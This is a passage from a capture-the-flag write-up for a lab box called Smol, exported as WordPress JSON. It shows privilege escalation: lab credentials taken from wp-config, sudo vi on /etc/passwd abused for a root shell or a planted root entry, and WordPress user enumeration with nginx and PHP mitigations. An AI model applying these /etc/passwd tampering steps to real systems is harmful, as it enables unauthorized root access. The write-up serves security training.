! defined( &#039;ABSPATH&#039; ) ) {\n        define( &#039;ABSPATH&#039;, __DIR__ . 
&#039;\/&#039; );\n}\n\n\/** Sets up WordPress vars and included files. *\/\nrequire_once ABSPATH . &#039;wp-settings.php&#039;;<\/code><\/pre>\n<p>This yields new credentials:<\/p>\n<pre><code class=\"language-bash\">xavi\nP@ssw0rdxavi@<\/code><\/pre>\n<p>Switch user:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550984.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550984.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607152548920\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Editing \/etc\/passwd to get a root shell<\/h3>\n<pre><code class=\"language-bash\">xavi@smol:~$ sudo -l\n[sudo] password for xavi: \nMatching Defaults entries for xavi on smol:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser xavi may run the following commands on smol:\n    (ALL : ALL) \/usr\/bin\/vi \/etc\/passwd<\/code><\/pre>\n<p>It turns out the <code>\/etc\/passwd<\/code> file can be edited: either add credentials to create a high-privilege user, or use the command mode of <code>vi<\/code> directly to get a shell; both work:<\/p>\n<h4>vi command mode<\/h4>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550985.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550985.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607152846462\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550986.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550986.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607152902834\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>Adding a high-privilege user<\/h4>\n<p>Adding a user with <code>root<\/code> privileges also works well, and I think this is what the box author intended to test; alternatively, blank out the root password with <code>root::0:0:root:\/root:\/usr\/bin\/bash<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol\/wordpress.old]\n\u2514\u2500$ openssl passwd -1 -salt kali kali  
\n$1$kali$\/rLA3oVIdYGokOY9m1jKj.<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550987.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550987.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607153442406\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">root@smol:\/home\/xavi$ cd ~\nroot@smol:~$ ls -la\ntotal 64K\ndrwx------  7 root root 4.0K Jun  7 07:34 .\ndrwxr-xr-x 18 root root 4.0K Mar 29  2024 ..\nlrwxrwxrwx  1 root root    9 Jun  2  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3.2K Jun 21  2023 .bashrc\ndrwx------  2 root root 4.0K Jun  2  2023 .cache\n-rw-------  1 root root   35 Mar 29  2024 .lesshst\ndrwxr-xr-x  3 root root 4.0K Jun 21  2023 .local\nlrwxrwxrwx  1 root root    9 Aug 18  2023 .mysql_history -&gt; \/dev\/null\ndrwxr-xr-x  4 root root 4.0K Aug 16  2023 .phpbrew\n-rw-r--r--  1 root root  161 Dec  5  2019 .profile\n-rw-r-----  1 root root   33 Aug 16  2023 root.txt\n-rw-r--r--  1 root root   75 Aug 17  2023 .selected_editor\ndrwx------  3 root root 4.0K Jun 21  2023 snap\ndrwx------  2 root root 4.0K Jun  2  2023 .ssh\n-rw-rw-rw-  1 root root  13K Jun  7 07:34 .viminfo\nroot@smol:~$ cat root.txt 
\nbf89ea3ea01992353aef1f576214d4e4<\/code><\/pre>\n<h2>Other attempts<\/h2>\n<p>I suddenly remembered that the group owner had previously mentioned an information leak in <code>wordpress<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ curl -s http:\/\/www.smol.hmv\/index.php\/wp-json\/WP\/V2\/users\/1 | jq\n{\n  &quot;id&quot;: 1,\n  &quot;name&quot;: &quot;admin&quot;,\n  &quot;url&quot;: &quot;http:\/\/www.smol.hmv&quot;,\n  &quot;description&quot;: &quot;&quot;,\n  &quot;link&quot;: &quot;http:\/\/www.smol.hmv\/index.php\/author\/admin\/&quot;,\n  &quot;slug&quot;: &quot;admin&quot;,\n  &quot;avatar_urls&quot;: {\n    &quot;24&quot;: &quot;https:\/\/secure.gravatar.com\/avatar\/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=24&amp;d=monsterid&amp;r=g&quot;,\n    &quot;48&quot;: &quot;https:\/\/secure.gravatar.com\/avatar\/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=48&amp;d=monsterid&amp;r=g&quot;,\n    &quot;96&quot;: &quot;https:\/\/secure.gravatar.com\/avatar\/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=96&amp;d=monsterid&amp;r=g&quot;\n  },\n  &quot;meta&quot;: [],\n  &quot;_links&quot;: {\n    &quot;self&quot;: [\n      {\n        &quot;href&quot;: &quot;http:\/\/www.smol.hmv\/index.php\/wp-json\/wp\/v2\/users\/1&quot;,\n        &quot;targetHints&quot;: {\n          &quot;allow&quot;: [\n            &quot;GET&quot;\n          ]\n        }\n      }\n    ],\n    &quot;collection&quot;: [\n      {\n        &quot;href&quot;: &quot;http:\/\/www.smol.hmv\/index.php\/wp-json\/wp\/v2\/users&quot;\n      }\n    ]\n  }\n}<\/code><\/pre>\n<p>A firewall needs to be configured to prevent this kind of leak....<\/p>\n<blockquote>\n<p>Reference: <a 
href=\"https:\/\/www.wpcom.cn\/tutorial\/301.html\">https:\/\/www.wpcom.cn\/tutorial\/301.html<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-nginx\">server {\n    location ~ ^\/wp-json\/wp\/v2\/users(\/.*)?$ {\n        deny all;\n        return 403;\n    }\n}<\/code><\/pre>\n<pre><code class=\"language-php\">\/**\n * Disable the WordPress user enumeration endpoint; only users with the editor role or above can access it.\n * \n * @author WPCOM\n * @version 1.0.0\n * @since 2024-12-26\n *\/\nadd_filter(&#039;rest_endpoints&#039;, function ($endpoints) {\n    global $has_users_endpoint;\n    if($has_users_endpoint) return $endpoints;\n\n    if(isset($endpoints[&#039;\/wp\/v2\/users&#039;])){\n        $users_endpoint = $endpoints[&#039;\/wp\/v2\/users&#039;];\n        unset($endpoints[&#039;\/wp\/v2\/users&#039;]);\n    }\n\n    \/\/ Editor role and above may list users\n    if (defined(&#039;REST_REQUEST&#039;) &amp;&amp; REST_REQUEST &amp;&amp; current_user_can(&#039;editor&#039;)) {\n        \/\/ Restore the \/wp\/v2\/users endpoint\n        if(isset($users_endpoint)) $endpoints[&#039;\/wp\/v2\/users&#039;] = $users_endpoint;\n        $has_users_endpoint = true;\n    }\n\n    return $endpoints;\n});\n# functions.php<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Smol Information gathering Port scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol] \u2514\u2500$ rustsca 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-835","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/835","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=835"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/835\/revisions"}],"predecessor-version":[{"id":836,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/835\/revisions\/836"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=835"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=835"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=835"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}